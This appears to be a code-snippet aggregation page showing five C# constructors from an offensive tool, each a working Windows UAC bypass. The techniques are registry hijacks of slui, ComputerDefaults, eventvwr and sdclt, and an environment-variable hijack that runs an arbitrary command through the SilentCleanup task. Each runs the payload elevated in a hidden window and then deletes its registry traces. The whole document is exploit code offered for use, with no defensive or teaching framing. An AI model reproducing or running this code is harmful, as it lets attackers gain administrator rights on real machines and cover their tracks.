예제 #1
0
        public Slui(byte[] encodedCommand)
        {
            //Credit: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation

            //Check if UAC is set to 'Always Notify'
            AlwaysNotify alwaysnotify = new AlwaysNotify();

            //Convert encoded command to a string
            string command = Encoding.UTF8.GetString(encodedCommand);

            //Set the registry key for eventvwr
            RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);

            newkey.CreateSubKey(@"exefile\Shell\Open\command");

            RegistryKey sluikey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\exefile\Shell\Open\command", true);

            sluikey.SetValue("", @command);
            sluikey.Close();

            //start fodhelper
            Process p = new Process();

            p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            p.StartInfo.FileName    = "C:\\windows\\system32\\slui.exe";
            p.StartInfo.Verb        = "runas";
            p.Start();

            //sleep 10 seconds to let the payload execute
            Thread.Sleep(10000);

            //Unset the registry
            newkey.DeleteSubKeyTree("exefile");
            return;
        }
예제 #2
0
        public ComputerDefaults(byte[] encodedCommand)
        {
            //Credit: https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1

            //Check if UAC is set to 'Always Notify'
            AlwaysNotify alwaysnotify = new AlwaysNotify();

            //Convert encoded command to a string
            string command = Encoding.UTF8.GetString(encodedCommand);

            //Set the registry key for fodhelper
            RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);

            newkey.CreateSubKey(@"ms-settings\Shell\Open\command");

            RegistryKey fod = Registry.CurrentUser.OpenSubKey(@"Software\Classes\ms-settings\Shell\Open\command", true);

            fod.SetValue("DelegateExecute", "");
            fod.SetValue("", @command);
            fod.Close();

            //start fodhelper
            Process p = new Process();

            p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            p.StartInfo.FileName    = "C:\\windows\\system32\\ComputerDefaults.exe";
            p.Start();

            //sleep 10 seconds to let the payload execute
            Thread.Sleep(10000);

            //Unset the registry
            newkey.DeleteSubKeyTree("ms-settings");
            return;
        }
예제 #3
0
        public EventVwr(byte[] encodedCommand)
        {
            //Credit: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

            //Check if UAC is set to 'Always Notify'
            AlwaysNotify alwaysnotify = new AlwaysNotify();

            //Convert encoded command to a string
            string command = Encoding.UTF8.GetString(encodedCommand);

            //Set the registry key for eventvwr
            RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);

            newkey.CreateSubKey(@"mscfile\Shell\Open\command");

            RegistryKey vwr = Registry.CurrentUser.OpenSubKey(@"Software\Classes\mscfile\Shell\Open\command", true);

            vwr.SetValue("", @command);
            vwr.Close();

            //start fodhelper
            Process p = new Process();

            p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            p.StartInfo.FileName    = "C:\\windows\\system32\\eventvwr.exe";
            p.Start();

            //sleep 10 seconds to let the payload execute
            Thread.Sleep(10000);

            //Unset the registry
            newkey.DeleteSubKeyTree("mscfile");
            return;
        }
예제 #4
0
        public Sdclt(byte[] encodedCommand)
        {
            // Credit: http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass

            //Check if UAC is set to 'Always Notify'
            AlwaysNotify alwaysnotify = new AlwaysNotify();

            //This only appears to work on Windows 10. Check the version of the OS
            RegistryKey osversion      = Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows NT\CurrentVersion\");
            string      windowsVersion = osversion.GetValue("ProductName").ToString();

            osversion.Close();
            if (!windowsVersion.Contains("Windows 10"))
            {
                System.Console.WriteLine("System is not Windows 10. This attack will fail. Exiting...");
                System.Environment.Exit(1);
            }

            //Convert encoded command to a string
            string command = Encoding.UTF8.GetString(encodedCommand);

            //Set the registry key
            RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);

            newkey.CreateSubKey(@"Folder\shell\open\command");

            RegistryKey sdclt = Registry.CurrentUser.OpenSubKey(@"Software\Classes\Folder\shell\open\command", true);

            sdclt.SetValue("", @command);
            sdclt.SetValue("DelegateExecute", "");
            sdclt.Close();

            //start process
            Process p = new Process();

            p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            p.StartInfo.FileName    = "C:\\windows\\system32\\sdclt.exe";
            p.Start();

            //sleep 10 seconds to let the payload execute
            Thread.Sleep(10000);

            //Unset the registry
            newkey.DeleteSubKeyTree("Folder");
            return;
        }
예제 #5
0
        public DiskCleanup(byte[] encodedCommand)
        {
            //Credit: https://github.com/gushmazuko/WinBypass/blob/master/DiskCleanupBypass_direct.ps1

            //Check if UAC is set to 'Always Notify'
            AlwaysNotify alwaysnotify = new AlwaysNotify();

            //Convert encoded command to a string
            string command = Encoding.UTF8.GetString(encodedCommand);

            //Check that the command ends in "&& REM"
            if (!command.Contains("REM"))
            {
                Console.WriteLine("Command must end in REM. Exiting...");
                System.Environment.Exit(1);
            }

            //Set the registry key for eventvwr
            RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Environment", true);

            newkey.SetValue("windir", @command);

            //start fodhelper
            Process p = new Process();

            p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            p.StartInfo.FileName    = "C:\\windows\\system32\\schtasks.exe";
            p.StartInfo.Arguments   = "/Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I";
            p.Start();

            //sleep 10 seconds to let the payload execute
            Thread.Sleep(10000);

            //Unset the registry
            newkey.DeleteValue("windir");
            return;
        }